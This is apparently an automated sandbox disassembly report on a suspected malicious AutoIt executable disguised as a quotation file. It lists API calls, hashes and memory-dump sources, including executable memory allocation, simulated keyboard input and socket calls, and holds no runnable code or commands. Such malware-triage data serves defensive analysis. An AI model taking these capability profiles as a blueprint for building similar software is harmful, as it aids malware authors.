                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Long
                                                                      • String ID: SysTreeView32
                                                                      • API String ID: 847901565-1698111956
                                                                      • Opcode ID: 026f2a09455ec386dd91e4b5df452509891ff10c19f82ada6b0cd349ac4ddc89
                                                                      • Instruction ID: bf741008243550f33c37f42b79dc9e2746c16576ccd212d58be7605dc215cce3
                                                                      • Opcode Fuzzy Hash: 026f2a09455ec386dd91e4b5df452509891ff10c19f82ada6b0cd349ac4ddc89
                                                                      • Instruction Fuzzy Hash: E431E031204206AFDB119F34CC45BEA77A9EB48328F205725F8BDB21E0D731EC919750
                                                                      APIs
                                                                      • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00E87461
                                                                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00E87475
                                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00E87499
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Window
                                                                      • String ID: SysMonthCal32
                                                                      • API String ID: 2326795674-1439706946
                                                                      • Opcode ID: fa41112655da22376ff784bf514e05556559fb72df5a8f6901e54fc1cc31e58a
                                                                      • Instruction ID: 3421b9424e6f584bc96c07c7b43f9b3d452ba4f8caf0a956b0e890b5f8cf0f69
                                                                      • Opcode Fuzzy Hash: fa41112655da22376ff784bf514e05556559fb72df5a8f6901e54fc1cc31e58a
                                                                      • Instruction Fuzzy Hash: 0B21B132500218AFDF11DF94CC46FEA3BA9EB48724F211214FE697B1D0DA75EC959BA0
                                                                      APIs
                                                                      • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00E87C4A
                                                                      • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00E87C58
                                                                      • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00E87C5F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$DestroyWindow
                                                                      • String ID: msctls_updown32
                                                                      • API String ID: 4014797782-2298589950
                                                                      • Opcode ID: d2743bc6ba3aa942dd0596f9b8c79a70c560af66b3d7408a85d5415b3071713a
                                                                      • Instruction ID: 9e5a0e6d95d0633fdb613fe8b6e9a6a88693cc0be4d24f0e22019431ec3a8541
                                                                      • Opcode Fuzzy Hash: d2743bc6ba3aa942dd0596f9b8c79a70c560af66b3d7408a85d5415b3071713a
                                                                      • Instruction Fuzzy Hash: B82181B5204208AFDB10EF64DCC5DA777EDEF49358B141459FA49AB3A1CB32EC418BA0
                                                                      APIs
                                                                      • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00E86D3B
                                                                      • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00E86D4B
                                                                      • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00E86D70
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$MoveWindow
                                                                      • String ID: Listbox
                                                                      • API String ID: 3315199576-2633736733
                                                                      • Opcode ID: 6d45a78d992c1c4d3b43ac214e5f0705e1d9ea07a317c930a92023aecef552b8
                                                                      • Instruction ID: 844e243d05c41f8ba314a2fca9f3ce577f03361da85d75a7c35efe2fdd1f8c58
                                                                      • Opcode Fuzzy Hash: 6d45a78d992c1c4d3b43ac214e5f0705e1d9ea07a317c930a92023aecef552b8
                                                                      • Instruction Fuzzy Hash: 7921C232610118BFDF12AF54DC45FAB3BBAEF89754F019124F94CBB1A0C671AC5187A0
                                                                      APIs
                                                                      • __snwprintf.LIBCMT ref: 00E73A66
                                                                        • Part of subcall function 00E07DE1: _memmove.LIBCMT ref: 00E07E22
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: __snwprintf_memmove
                                                                      • String ID: , $$AUTOITCALLVARIABLE%d$%
                                                                      • API String ID: 3506404897-3879706725
                                                                      • Opcode ID: fa9510ab119590677bb08536518fe6e4a65b041b2eaf1b20e7f0be4130985f63
                                                                      • Instruction ID: 480e7009d64828ca54f51a452789d58559bd81fdc46a131bef0c94bda3a0f080
                                                                      • Opcode Fuzzy Hash: fa9510ab119590677bb08536518fe6e4a65b041b2eaf1b20e7f0be4130985f63
                                                                      • Instruction Fuzzy Hash: 3F218171A00219AACF10EF64CC82AAEB7F9EF44300F406455E489BB281DB30EA45DB61
                                                                      APIs
                                                                      • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00E87772
                                                                      • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00E87787
                                                                      • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00E87794
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend
                                                                      • String ID: msctls_trackbar32
                                                                      • API String ID: 3850602802-1010561917
                                                                      • Opcode ID: e280da7b56fbaac729d18ce395a26d2e74b61824db9812d4984c42a69fa3d852
                                                                      • Instruction ID: 03509847cc767a4d31f073cbc24ccd8e93160bd2cc4e2d9c6260a44756aed0c8
                                                                      • Opcode Fuzzy Hash: e280da7b56fbaac729d18ce395a26d2e74b61824db9812d4984c42a69fa3d852
                                                                      • Instruction Fuzzy Hash: AB113A32244208BFEF106F61CC01FDB77A9EF88B55F110129F689B60D0C272E851CB20
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: __calloc_crt
                                                                      • String ID: $@B
                                                                      • API String ID: 3494438863-460053111
                                                                      • Opcode ID: a695052cfcee43a73b4ed655683e813a3551ab8644fe1d1e71bf457754bc7822
                                                                      • Instruction ID: 1f14152977951a474ec3e06d8ae419a0a5c6900e0a2784b724c91ecb4a6927c2
                                                                      • Opcode Fuzzy Hash: a695052cfcee43a73b4ed655683e813a3551ab8644fe1d1e71bf457754bc7822
                                                                      • Instruction Fuzzy Hash: CCF0C872205631CFF7288F15BC51FB267E4E740330F501126E900FE1A0EB3198C646C0
                                                                      APIs
                                                                      • __lock.LIBCMT ref: 00E29B94
                                                                        • Part of subcall function 00E29C0B: __mtinitlocknum.LIBCMT ref: 00E29C1D
                                                                        • Part of subcall function 00E29C0B: EnterCriticalSection.KERNEL32(00000000,?,00E29A7C,0000000D), ref: 00E29C36
                                                                      • __updatetlocinfoEx_nolock.LIBCMT ref: 00E29BA4
                                                                        • Part of subcall function 00E29100: ___addlocaleref.LIBCMT ref: 00E2911C
                                                                        • Part of subcall function 00E29100: ___removelocaleref.LIBCMT ref: 00E29127
                                                                        • Part of subcall function 00E29100: ___freetlocinfo.LIBCMT ref: 00E2913B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: CriticalEnterEx_nolockSection___addlocaleref___freetlocinfo___removelocaleref__lock__mtinitlocknum__updatetlocinfo
                                                                      • String ID: 8$8
                                                                      • API String ID: 547918592-2648740355
                                                                      • Opcode ID: 8fc0d12386165d0546b49b2b9816d984772ac3164f699d11221388fe43fa2a98
                                                                      • Instruction ID: b40b8151e23ae30c5be3c168a6cd1fe006f8c0e7cac48edb7103818b85fcd611
                                                                      • Opcode Fuzzy Hash: 8fc0d12386165d0546b49b2b9816d984772ac3164f699d11221388fe43fa2a98
                                                                      • Instruction Fuzzy Hash: 82E08C71943320AAEA24BBA47B83BCA66D09B40B21F20329AF049752C2CDB00440861B
                                                                      APIs
                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,00E04B83,?), ref: 00E04C44
                                                                      • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00E04C56
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: AddressLibraryLoadProc
                                                                      • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                      • API String ID: 2574300362-1355242751
                                                                      • Opcode ID: 3a3db06ae6c8aeda799638ed1a63048571799a413fabde8e668a5480a6209246
                                                                      • Instruction ID: bb4cf97f73a8541308a5bf156cfb1c557a77e8e2cc0d884f50e134355a187e40
                                                                      • Opcode Fuzzy Hash: 3a3db06ae6c8aeda799638ed1a63048571799a413fabde8e668a5480a6209246
                                                                      • Instruction Fuzzy Hash: ADD0C7B0602713CFE7209F32CA4820AB2E4AF00351B10983ED59AF61A0E670C8C0CB20
                                                                      APIs
                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,00E04BD0,?,00E04DEF,?,00EC52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00E04C11
                                                                      • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00E04C23
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: AddressLibraryLoadProc
                                                                      • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                      • API String ID: 2574300362-3689287502
                                                                      • Opcode ID: c19f84948b6954d21604e7c0c07d44295dfa3d228e99a3e33ae89cb06b154665
                                                                      • Instruction ID: 9eddce74343701a350f9ea82b079258bb90d5703ed4f3c6c2ba8ad3fc876a205
                                                                      • Opcode Fuzzy Hash: c19f84948b6954d21604e7c0c07d44295dfa3d228e99a3e33ae89cb06b154665
                                                                      • Instruction Fuzzy Hash: 73D0C2B0502713CFE7206F71CA4820BB6D5EF08352B009C39D489F2190E6B0C4C0C710
                                                                      APIs
                                                                      • LoadLibraryA.KERNEL32(advapi32.dll,?,00E81039), ref: 00E80DF5
                                                                      • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00E80E07
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: AddressLibraryLoadProc
                                                                      • String ID: RegDeleteKeyExW$advapi32.dll
                                                                      • API String ID: 2574300362-4033151799
                                                                      • Opcode ID: 3907188c4773105fe5ac1217bddda2e45a0743fad517e65869fe7a244546f8bc
                                                                      • Instruction ID: a9b27a70f9387c540527dcc8f0cc1452bb31f2193ae18962230ee5c6398c916e
                                                                      • Opcode Fuzzy Hash: 3907188c4773105fe5ac1217bddda2e45a0743fad517e65869fe7a244546f8bc
                                                                      • Instruction Fuzzy Hash: 28D0C730581322CFCB20AF72C8082C372E4AF04342F00AC3ED58EF2152E6B0D894CB60
                                                                      APIs
                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00E78CF4,?,00E8F910), ref: 00E790EE
                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00E79100
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: AddressLibraryLoadProc
                                                                      • String ID: GetModuleHandleExW$kernel32.dll
                                                                      • API String ID: 2574300362-199464113
                                                                      • Opcode ID: 7e893cc85d111e025cbd1c9d2476cb8dc6a0371b15b8695108188008e0edb80b
                                                                      • Instruction ID: 533200cd1f57967598a77bcdf04500e6c68d63334fc06c64bc6b4824aaab8708
                                                                      • Opcode Fuzzy Hash: 7e893cc85d111e025cbd1c9d2476cb8dc6a0371b15b8695108188008e0edb80b
                                                                      • Instruction Fuzzy Hash: 49D01734651713CFDB209F3AE81C64676E8AF05755B52D83AD48EF6691EA70C890CB90
                                                                      APIs
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: LocalTime__swprintf
                                                                      • String ID: %.3d$WIN_XPe
                                                                      • API String ID: 2070861257-2409531811
                                                                      • Opcode ID: a0f29e449085c41d23ea16e2db3c2a1c42fcb1180489f18ef421e68fb9c771d9
                                                                      • Instruction ID: 892da340dea8c05d1158eb3680eac01bb09542408898159e4eecbb7fc84c8073
                                                                      • Opcode Fuzzy Hash: a0f29e449085c41d23ea16e2db3c2a1c42fcb1180489f18ef421e68fb9c771d9
                                                                      • Instruction Fuzzy Hash: 48D01271845219FACF109791B88C8F9737CA70A301F202593F516B2040E22597D4EA21
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7607238fb0b8473d4e49a5bde810d915f933c1583b6bb72b1664d10b6345c646
                                                                      • Instruction ID: 2f9f8de1b0bd4a851f9359497810f04133895831cecb392288e084bea5053d13
                                                                      • Opcode Fuzzy Hash: 7607238fb0b8473d4e49a5bde810d915f933c1583b6bb72b1664d10b6345c646
                                                                      • Instruction Fuzzy Hash: 2FC1AE74A04216EFCB14CFA4D884EAEBBB5FF48315B109998EC95EB250D730ED85DB90
                                                                      APIs
                                                                      • CharLowerBuffW.USER32(?,?), ref: 00E7E0BE
                                                                      • CharLowerBuffW.USER32(?,?), ref: 00E7E101
                                                                        • Part of subcall function 00E7D7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00E7D7C5
                                                                      • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00E7E301
                                                                      • _memmove.LIBCMT ref: 00E7E314
                                                                      Similarity
                                                                      • API ID: BuffCharLower$AllocVirtual_memmove
                                                                      • String ID:
                                                                      • API String ID: 3659485706-0
                                                                      • Opcode ID: e9589b1759f1ec55c205dba8c725f79dca58f2cccaf728b6bc4ea1837d134111
                                                                      • Instruction ID: b9d581dc18476c2666c74b4a26d49c56ea9ab348cd75ffa54844593487ca3f56
                                                                      • Opcode Fuzzy Hash: e9589b1759f1ec55c205dba8c725f79dca58f2cccaf728b6bc4ea1837d134111
                                                                      • Instruction Fuzzy Hash: B1C15A716083019FC704DF28C48196ABBE4FF89718F14996EF899AB392D730E946CB81
                                                                      APIs
                                                                      • CoInitialize.OLE32(00000000), ref: 00E780C3
                                                                      • CoUninitialize.OLE32 ref: 00E780CE
                                                                        • Part of subcall function 00E5D56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00E5D5D4
                                                                      • VariantInit.OLEAUT32(?), ref: 00E780D9
                                                                      • VariantClear.OLEAUT32(?), ref: 00E783AA
                                                                      Similarity
                                                                      • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                      • String ID:
                                                                      • API String ID: 780911581-0
                                                                      • Opcode ID: b299597e894f1cdf81e95fc630526575baf889d792ba60adf0fdfc5a6d0b427f
                                                                      • Instruction ID: b396734fe90a4c4cc22d45bb2d7d7ca461d8892c8a3e73cf9d9f117e585c453a
                                                                      • Opcode Fuzzy Hash: b299597e894f1cdf81e95fc630526575baf889d792ba60adf0fdfc5a6d0b427f
                                                                      • Instruction Fuzzy Hash: 54A189756047019FCB04DF64C985B2AB7E4BF99324F04944DF99AAB3A2CB30EC44CB92
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: Variant$AllocClearCopyInitString
                                                                      • String ID:
                                                                      • API String ID: 2808897238-0
                                                                      • Opcode ID: 05133c50685702dad0b4c7669be0593d207e474fd9617de9e74914d02517e585
                                                                      • Instruction ID: b291f8ddb58495f35f7f88475a306ca483b27a9223c5a103f9c82712df79417b
                                                                      • Opcode Fuzzy Hash: 05133c50685702dad0b4c7669be0593d207e474fd9617de9e74914d02517e585
                                                                      • Instruction Fuzzy Hash: 8B5191747003019EDF24AF65D891A6AB3E5AF45315FA0FC1FE996FB293DA70D8888701
                                                                      APIs
                                                                      • GetWindowRect.USER32(0101ECB0,?), ref: 00E89863
                                                                      • ScreenToClient.USER32(00000002,00000002), ref: 00E89896
                                                                      • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00E89903
                                                                      Similarity
                                                                      • API ID: Window$ClientMoveRectScreen
                                                                      • String ID:
                                                                      • API String ID: 3880355969-0
                                                                      • Opcode ID: ee53e5c0065b988a2e642640645eb99086926cc51c201572516d7d859d820787
                                                                      • Instruction ID: 7c1f03b9df76e0ccb9b970204432434b5c554248369387255dc77142fc303240
                                                                      • Opcode Fuzzy Hash: ee53e5c0065b988a2e642640645eb99086926cc51c201572516d7d859d820787
                                                                      • Instruction Fuzzy Hash: B0512D35A00209AFCB14DF54C884ABE7BB5FF85364F149269F85DAB2A1D731AD81CB90
                                                                      APIs
                                                                      • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00E59AD2
                                                                      • __itow.LIBCMT ref: 00E59B03
                                                                        • Part of subcall function 00E59D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00E59DBE
                                                                      • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00E59B6C
                                                                      • __itow.LIBCMT ref: 00E59BC3
                                                                      Similarity
                                                                      • API ID: MessageSend$__itow
                                                                      • String ID:
                                                                      • API String ID: 3379773720-0
                                                                      • Opcode ID: c6eb2bbc461eb239acb833538c47269e4c7335803105ac963c1e464c0585496d
                                                                      • Instruction ID: d2847e1965cdf14a68e47a3801fee60b32cf562b6ef309a0a63df2f5a45cecf5
                                                                      • Opcode Fuzzy Hash: c6eb2bbc461eb239acb833538c47269e4c7335803105ac963c1e464c0585496d
                                                                      • Instruction Fuzzy Hash: 29417F70A00208ABEF11EF54D845BEE7BF9EF48715F001459FD45B6292DB74AD88CBA1
                                                                      APIs
                                                                      • socket.WSOCK32(00000002,00000002,00000011), ref: 00E769D1
                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00E769E1
                                                                        • Part of subcall function 00E09837: __itow.LIBCMT ref: 00E09862
                                                                        • Part of subcall function 00E09837: __swprintf.LIBCMT ref: 00E098AC
                                                                      • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00E76A45
                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00E76A51
                                                                      Similarity
                                                                      • API ID: ErrorLast$__itow__swprintfsocket
                                                                      • String ID:
                                                                      • API String ID: 2214342067-0
                                                                      • Opcode ID: 966d07f05f6a46b02fa691e4839802e5a1590bb00a1d973d60e808b11ff18459
                                                                      • Instruction ID: 84ddbccba59070ac17ff317b1813c7e1a56c7f9fca808bda3924f95bbb1854ac
                                                                      • Opcode Fuzzy Hash: 966d07f05f6a46b02fa691e4839802e5a1590bb00a1d973d60e808b11ff18459
                                                                      • Instruction Fuzzy Hash: 6341AE75740600AFEB64AF24CC86F6A77E8DB04B14F04E558FA59BB3D3DA709D408B91
                                                                      APIs
                                                                      • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00E8F910), ref: 00E764A7
                                                                      • _strlen.LIBCMT ref: 00E764D9
                                                                      Similarity
                                                                      • API ID: _strlen
                                                                      • String ID:
                                                                      • API String ID: 4218353326-0
                                                                      • Opcode ID: b9e846a94ef35b869cad26c3d16483a8d875144ea86632df9af00ea1f09ab5a6
                                                                      • Instruction ID: 461f13560ddc18ae12ed2d4d31b214239604fcdd33e69a67da8ba0ad879329b4
                                                                      • Opcode Fuzzy Hash: b9e846a94ef35b869cad26c3d16483a8d875144ea86632df9af00ea1f09ab5a6
                                                                      • Instruction Fuzzy Hash: 1E418F31600504AFCB14EBA8EC85EAEB7F9AF44318F149555F919B72D3EB30AD44DB50
                                                                      APIs
                                                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00E6B89E
                                                                      • GetLastError.KERNEL32(?,00000000), ref: 00E6B8C4
                                                                      • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00E6B8E9
                                                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00E6B915
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: CreateHardLink$DeleteErrorFileLast
                                                                      • String ID:
                                                                      • API String ID: 3321077145-0
                                                                      APIs
                                                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00E888DE
                                                                      Similarity
                                                                      • API ID: InvalidateRect
                                                                      • String ID:
                                                                      • API String ID: 634782764-0
                                                                      APIs
                                                                      • ClientToScreen.USER32(?,?), ref: 00E8AB60
                                                                      • GetWindowRect.USER32(?,?), ref: 00E8ABD6
                                                                      • PtInRect.USER32(?,?,00E8C014), ref: 00E8ABE6
                                                                      • MessageBeep.USER32(00000000), ref: 00E8AC57
                                                                      Similarity
                                                                      • API ID: Rect$BeepClientMessageScreenWindow
                                                                      • String ID:
                                                                      • API String ID: 1352109105-0
                                                                      APIs
                                                                      • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00E60B27
                                                                      • SetKeyboardState.USER32(00000080,?,00000001), ref: 00E60B43
                                                                      • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00E60BA9
                                                                      • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00E60BFB
                                                                      Similarity
                                                                      • API ID: KeyboardState$InputMessagePostSend
                                                                      • String ID:
                                                                      • API String ID: 432972143-0
                                                                      APIs
                                                                      • GetKeyboardState.USER32(?,7694C0D0,?,00008000), ref: 00E60C66
                                                                      • SetKeyboardState.USER32(00000080,?,00008000), ref: 00E60C82
                                                                      • PostMessageW.USER32(00000000,00000101,00000000), ref: 00E60CE1
                                                                      • SendInput.USER32(00000001,?,0000001C,7694C0D0,?,00008000), ref: 00E60D33
                                                                      Similarity
                                                                      • API ID: KeyboardState$InputMessagePostSend
                                                                      • String ID:
                                                                      • API String ID: 432972143-0
                                                                      APIs
